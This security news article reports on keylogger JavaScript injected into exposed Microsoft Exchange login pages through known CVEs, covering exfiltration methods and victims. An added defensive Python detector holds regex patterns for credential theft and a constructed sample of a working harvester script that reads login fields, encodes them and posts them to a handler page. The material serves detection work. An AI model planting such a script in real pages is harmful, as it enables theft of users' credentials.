Unidentified threat actors are actively targeting publicly exposed Microsoft Exchange servers by injecting malicious code into login pages to harvest credentials.
In an analysis published last week, Positive Technologies revealed that it identified two types of keylogger code, both written in JavaScript, embedded in the Outlook login page:
- One variant saves the collected data to a local file on the server, which attackers can then access over the internet.
- The other immediately transmits the harvested data to an external server.
Furthermore, the Russian cybersecurity vendor confirmed that these attacks have already affected 65 victims across 26 countries. This activity continues a broader campaign first observed in May 2024, which initially targeted entities in Africa and the Middle East.
At that time, the company had already discovered at least 30 victims, including government agencies, banks, IT companies, and educational institutions. The evidence suggests that the first compromise occurred as early as 2021.
The attack chain typically begins with the exploitation of known Microsoft Exchange Server vulnerabilities (e.g., ProxyShell), which lets attackers insert keylogger code into the login page. Researchers have not yet identified the individuals or groups behind the operation.
The attackers have weaponized several specific vulnerabilities, including:
- CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
- CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
- CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerabilities (ProxyLogon)
- CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
- CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 – Microsoft Exchange Server Security Feature Bypass Vulnerabilities (ProxyShell)
Security researchers Klimentiy Galkin and Maxim Suslov explained that the malicious JavaScript reads and processes data from the authentication form. It then transmits the data using an XHR request to a specific page on the compromised Exchange server.
This target page includes a handler function that processes incoming requests and writes the captured credentials to a file on the server.
Since this file remains accessible from an external network, attackers can retrieve the data remotely. Notably, certain variants of the keylogger also capture user cookies, User-Agent strings, and timestamps.
This method offers a key advantage: because it generates no outbound traffic from the compromised server, it greatly reduces the likelihood of detection.
Meanwhile, a second variant uncovered by Positive Technologies relies on a Telegram bot for exfiltration. It sends the stolen credentials through XHR GET requests, with the encoded login and password values included in the APIKey and AuthToken headers.
Additionally, another tactic uses a DNS tunnel combined with an HTTPS POST request to exfiltrate credentials while bypassing organizational defenses.
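One defender-side check that follows from the technique described above: scan copies of the OWA logon page for inline scripts that both read the credential fields and send data anywhere, and compare the page file against a hash recorded at deployment. This is an added example, not code from Positive Technologies or the article; the regex patterns, the sample pages, and the handler path are constructed assumptions.

```python
import hashlib
import re

# Traits the injected script needs: read the login form, optionally encode the values,
# and move them somewhere (a handler page on the same server, a Telegram bot via XHR GET,
# or a beacon image). Patterns are heuristic assumptions, not indicators from the report.
INLINE_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
READS_FORM = re.compile(r"\b(username|password|passwd|pwd)\b[^;]{0,80}\.value", re.I)
SENDS_DATA = re.compile(
    r"XMLHttpRequest|\bfetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=\s*['\"]https?://", re.I)
ENCODES = re.compile(r"\bbtoa\s*\(|encodeURIComponent\s*\(|\bescape\s*\(", re.I)

def indicators(js):
    """Return the keylogger traits present in one inline script body."""
    found = []
    for name, pat in (("reads-credential-field", READS_FORM),
                      ("network-send", SENDS_DATA), ("encodes-value", ENCODES)):
        if pat.search(js):
            found.append(name)
    return found

def find_injected_scripts(html):
    """Flag inline scripts that both read credential fields and send data somewhere."""
    findings = []
    for m in INLINE_SCRIPT.finditer(html):
        hits = indicators(m.group(1))
        if "reads-credential-field" in hits and "network-send" in hits:
            findings.append({"offset": m.start(), "indicators": hits,
                             "snippet": m.group(1).strip()[:100]})
    return findings

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def integrity_changed(current, baseline_hex):
    """Compare a page file against the hash you recorded at deployment time."""
    return sha256_hex(current) != baseline_hex

# Constructed samples: a benign logon page, and the same page with an injected harvester
# modelled on the report's description (form read, XHR to a same-server handler page).
CLEAN_PAGE = """<form id="logonForm"><input id="username"><input id="password" type="password">
<script>function chk(){ if(document.getElementById("username").value==="") alert("Enter a name"); }
</script></form>"""
INJECTED_PAGE = CLEAN_PAGE + """<script>
document.getElementById("logonForm").addEventListener("submit", function(){
  var u = document.getElementById("username").value, p = document.getElementById("password").value;
  var x = new XMLHttpRequest(); x.open("POST", "/owa/auth/HANDLER_PLACEHOLDER.aspx", true);
  x.send(btoa(u + ":" + p)); });
</script>"""
```

Run `find_injected_scripts` over each exported page; a benign validation script that only reads the form is not flagged, while a hash mismatch against your baseline warrants a manual diff even when no pattern fires.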
Out of all the infected systems, 22 belong to government organizations. The rest span the IT, industrial, and logistics sectors. The top 10 affected countries include Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey.
Positive Technologies emphasized that many Microsoft Exchange servers exposed to the internet remain vulnerable to older, well-documented flaws. By embedding malicious code into legitimate authentication pages, attackers can maintain long-term access while stealthily capturing user credentials in plaintext.
Source: TheHackerNews